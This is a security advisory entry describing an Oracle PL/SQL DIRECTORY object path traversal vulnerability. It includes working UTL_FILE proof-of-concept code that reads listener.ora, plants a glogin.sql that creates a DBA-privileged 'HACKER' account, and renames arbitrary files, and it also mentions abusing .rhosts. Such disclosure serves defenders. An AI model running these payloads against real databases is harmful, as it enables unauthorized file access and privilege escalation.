Threat Finder

Threat ID
87
Threat Date
08/06/2007
Threat Name
DIRECTORY object path traversal
CVE Reference
CVE-2005-0298
CVE-2005-0701
CVE-2006-7141
CCE Reference
CCE-NO-MATCH
Risk
High
Database Type
Oracle
Category
Patchable Vulnerabilities
Versions
Oracle 10g Release 1, 9i and 8i
Summary
Sensitive information can be disclosed and modified by abusing the DIRECTORY object. Specifying a specially crafted path in the DIRECTORY object allows a low privileged remote attacker to access arbitrary files on the operating system.
Overview
Oracle's PL/SQL extension provides DIRECTORY objects for accessing filesystem resources on the server. One can create a DIRECTORY object by specifying a name and the physical path it points to.
CREATE DIRECTORY [name] AS [path]
Various built-in PL/SQL functions use paths in reference to DIRECTORY objects when accessing server's filesystem. Access is restricted only to locations that fall within the specefied paths. However, some of the functions do not properly validate the user supplied parameters allowing one to access resources (files and directories) located outside of the specified paths.
A malicious attacker can use this to read, modify or destroy sensitive information. For example, an attacker can gain unauthenticted access to the system by adding an entry to the $HOME/.rhosts file.

One such package known to be vulnerable to this type of attack is UTIL_FILE. Below is an example that uses UTIL_FILE to read the listener.ora file.

SET SERVEROUTPUT ON
declare
f utl_file.file_type;
sBuffer Varchar(8000);
begin
f:=UTL_FILE.FOPEN ('MEDIA_DIR','\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\$ORACLE_HOME\ora90\network\ADMIN\listener.ora','r');
loop
UTL_FILE.GET_LINE (f,sBuffer);
DBMS_OUTPUT.PUT_LINE(sBuffer);
end loop;
EXCEPTION
when no_data_found then
UTL_FILE.FCLOSE(f);
end;


--Create a file mytextfile.txt in the same directory referenced by MEDIA_DIR directory object.
declare
f utl_file.file_type;
begin
f := UTL_FILE.FOPEN ('MEDIA_DIR','\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\glogin.sql','w',1000);
UTL_FILE.PUT_LINE (f,'CREATE USER HACKER IDENTIFIED BY HACKER;',TRUE);
UTL_FILE.PUT_LINE (f,'GRANT DBA TO HACKER;',TRUE);
UTL_FILE.FCLOSE(f);
end;

--Read arbitrary files in the same drive as the directory referenced by MEDIA_DIR directory object.
SET SERVEROUTPUT ON
declare
f utl_file.file_type;
sBuffer Varchar(8000);
begin
f := UTL_FILE.FOPEN ('MEDIA_DIR','\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\oracle\ora92\network\ADMIN\listener.ora','r');
loop
UTL_FILE.GET_LINE (f,sBuffer);
DBMS_OUTPUT.PUT_LINE(sBuffer);
end loop;
EXCEPTION
when no_data_found then
UTL_FILE.FCLOSE(f);
end;

--Rename any file in the same drive as the directory referenced by MEDIA_DIR directory object
begin
UTL_FILE.frename('MEDIA_DIR','\\.\\..\\.\\..\\.\\myoldtextfile.txt','MEDIA_DIR','\\.\\..\\.\\..\\.\\mynewtextfile.txt',TRUE);
end;


Since PUBLIC, by default, has permissions on UTL_FILE, anyone with permission to use MEDIA_DIR can successfully execute this code.

Other similar PL/SQL functions that parse paths are most likely to be vulnerable.
References
http://download-west.oracle.com/docs/cd/B10501_01/appdev.920/a96612/u_file.htm#ARPLS069
http://petefinnigan.com/directory_traversal.pdf
http://www.argeniss.com/research/ARGENISS-ADV-030501.txt
http://www.oracle.com/technology/deploy/security/pdf/2004alert68.pdf
http://www.oracle.com/technology/deploy/security/pdf/cpu-jan-2005_advisory.pdf
VMSKey
STIGID

Additional information including fix script information is available in the licensed versions of Application Security's DbProtect and AppDetectivePro solutions.

Powered by